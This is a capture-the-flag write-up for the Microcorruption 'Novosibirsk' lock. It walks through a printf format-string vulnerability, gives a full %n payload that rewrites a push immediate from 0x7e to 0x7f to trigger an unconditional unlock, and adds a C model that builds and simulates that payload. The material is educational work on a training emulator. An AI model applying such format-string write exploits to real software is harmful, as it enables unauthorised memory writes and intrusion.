This is a write-up of my solution to the Microcorruption CTF challenge "Novosibirsk" (LOCKIT PRO r c.02).
In this challenge, we're given a hint right from the start:
OVERVIEW
- This lock is attached to the LockIT Pro HSM-2.
- We have added features from b.03 to the new hardware.
If you recall from the b.03 challenge (Addis Ababa), we had to exploit a printf() format string vulnerability, using %n to write a value of our choosing to an arbitrary memory location. Let's see if we need to do something similar in this challenge...
Inside main(), we can see that printf() is called a few times as well as strcpy(). Let's try entering AB%x as the password and see what the program prints.
We get back AB4241. The %x consumed the first argument printf() pulls off the stack and printed 0x4241, which is the little-endian word formed by our own "A" (0x41) and "B" (0x42). So our input is passed to printf() directly as the format string, and the first argument printf() reads is the start of our own buffer. Recall from Addis Ababa that with %n we can use this to write at arbitrary locations in memory.
Let's check out the program again and figure out where we can write to in order to unlock the door. Here's the code for conditional_unlock_door():
44b0 <conditional_unlock_door>
44b0: 0412 push r4
44b2: 0441 mov sp, r4
44b4: 2453 incd r4
44b6: 2183 decd sp
44b8: c443 fcff mov.b #0x0, -0x4(r4)
44bc: 3e40 fcff mov #0xfffc, r14
44c0: 0e54 add r4, r14
44c2: 0e12 push r14
44c4: 0f12 push r15
44c6: 3012 7e00 push #0x7e
44ca: b012 3645 call #0x4536 <INT>
44ce: 5f44 fcff mov.b -0x4(r4), r15
44d2: 8f11 sxt r15
44d4: 3152 add #0x8, sp
44d6: 3441 pop r4
44d8: 3041 ret
From Whitehorse we learned that pushing 0x7f before calling INT triggers the unconditional unlock interrupt, which opens the deadbolt with no password check. Here the function pushes 0x7e instead: that interrupt asks the HSM-2 to verify the password and only sets the flag at -0x4(r4) if it matches. The 0x7e is an immediate operand, so it lives in the code itself: push #0x7e at 0x44c6 is encoded as 30 12 7e 00, which puts the byte 0x7e at address 0x44c8. Thankfully, %n writes the number of characters printf() has printed so far to the address it pulls from its next argument, and we just saw that this argument is the start of our own input. So if the input begins with the target address 0x44c8 in little-endian byte order (c8 44), is padded so that exactly 127 (0x7f) characters have been printed by the time %n is reached, and ends with %n, printf() overwrites the immediate and the instruction becomes push #0x7f. Two details to get right: the two address bytes are printed too, so they count towards the 127, leaving 125 bytes of padding (0x41, "A"); and since the input passes through strcpy(), neither address byte may be 0x00, which 0xc8 and 0x44 satisfy.
c844 + 125 × 0x41 + %n
c8444141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141256e
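To make the character counting concrete, here is a small C model of the lock's printf() and of the payload construction. This is added example code, not the challenge firmware or my solution above: it fakes a 64 KB MSP430 memory, assumes the input buffer sits at 0x2400 (a guess made for the model; only the 0x44c8 operand address and the 30 12 7e 00 encoding come from the listing), and implements just the %x and %n specifiers. It reproduces the AB%x probe, builds the c844 + padding + %n payload for a chosen target and value, and shows the immediate of push #0x7e turning into 0x7f.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout for this model (not taken from the write-up): input buffer at 0x2400. */
#define INPUT_ADDR    0x2400
/* From the listing: push #0x7e at 0x44c6 is encoded 30 12 7e 00, so the immediate is at 0x44c8. */
#define PUSH_IMM_ADDR 0x44c8

static uint8_t  mem[0x10000];   /* fake 64 KB MSP430 address space */
static uint16_t last_x;         /* value consumed by the most recent %x */

static uint16_t rd16(uint16_t a) { return (uint16_t)(mem[a] | (mem[(uint16_t)(a + 1)] << 8)); }
static void     wr16(uint16_t a, uint16_t v) { mem[a] = (uint8_t)v; mem[(uint16_t)(a + 1)] = (uint8_t)(v >> 8); }

/* Minimal model of the lock's printf: walks the format string at `fmt`, pulls 16-bit
 * varargs from `args`, counts every character it would emit, and on %n stores that
 * count (as a little-endian 16-bit word) at the address taken from the varargs. */
static int toy_printf(uint16_t fmt, uint16_t args) {
    int count = 0;
    for (uint16_t p = fmt; mem[p] != 0; p++) {
        if (mem[p] != '%') { count++; continue; }
        uint8_t  spec = mem[++p];
        uint16_t arg  = rd16(args);
        args += 2;
        if (spec == 'x') {
            char tmp[8];
            last_x = arg;
            count += snprintf(tmp, sizeof tmp, "%x", (unsigned)arg);  /* length of the hex text */
        } else if (spec == 'n') {
            wr16(arg, (uint16_t)count);
        } else {
            count++;  /* other specifiers are not modelled; treat as one literal character */
        }
    }
    return count;
}

static void reset(void) {
    memset(mem, 0, sizeof mem);
    /* 44c6: 3012 7e00   push #0x7e */
    mem[0x44c6] = 0x30; mem[0x44c7] = 0x12; mem[0x44c8] = 0x7e; mem[0x44c9] = 0x00;
}

/* Build <target little-endian> <padding> "%n". The two address bytes are printed too,
 * so they count towards the value %n writes; padding is therefore value - 2.
 * Returns the payload length (without the NUL) or -1 if it cannot be built. */
static int build_payload(uint8_t *out, size_t cap, uint16_t target, uint8_t value) {
    uint8_t lo = target & 0xff, hi = target >> 8;
    /* strcpy() stops at 0x00, and a '%' inside the address would start a directive */
    if (value < 2 || lo == 0 || hi == 0 || lo == '%' || hi == '%') return -1;
    size_t pad = (size_t)value - 2;
    if (cap < pad + 5) return -1;
    out[0] = lo; out[1] = hi;
    memset(out + 2, 'A', pad);
    out[2 + pad] = '%'; out[3 + pad] = 'n'; out[4 + pad] = 0;
    return (int)(pad + 4);
}

/* Length of the payload for a given target and value, or -1 if it cannot be built. */
static int payload_len(uint16_t target, uint8_t value) {
    uint8_t buf[300];
    return build_payload(buf, sizeof buf, target, value);
}

/* Feed a payload to the model as the lock would: copy it into the input buffer and call
 * printf(buffer) with the buffer itself as the first vararg, which is what the
 * AB%x -> 4241 probe showed. Returns the number of characters printed. */
static int run_input(const uint8_t *payload, size_t len) {
    reset();
    memcpy(&mem[INPUT_ADDR], payload, len);
    mem[INPUT_ADDR + len] = 0;
    return toy_printf(INPUT_ADDR, INPUT_ADDR);
}

/* The probe from the write-up: %x shows the buffer's own first word. */
static uint16_t probe(void) {
    const uint8_t in[] = "AB%x";
    run_input(in, 4);
    return last_x;  /* 0x4241 */
}

/* The exploit: rewrite the 0x7e immediate to 0x7f. Returns the patched operand. */
static uint16_t exploit(void) {
    uint8_t payload[256];
    int n = build_payload(payload, sizeof payload, PUSH_IMM_ADDR, 0x7f);
    if (n < 0) return 0;
    run_input(payload, (size_t)n);
    return rd16(PUSH_IMM_ADDR);  /* 0x007f: the instruction is now push #0x7f */
}

int main(void) {
    printf("%%x probe -> %04x\n", probe());
    printf("push immediate after exploit -> %04x\n", exploit());
    return 0;
}
```

build_payload() refuses a target whose address bytes contain 0x00 or '%', which is the check worth doing before sending anything through a strcpy()-then-printf() path; for 0x44c8 both bytes are clean, and the resulting payload is 129 bytes: two address bytes, 125 bytes of padding, and the %n.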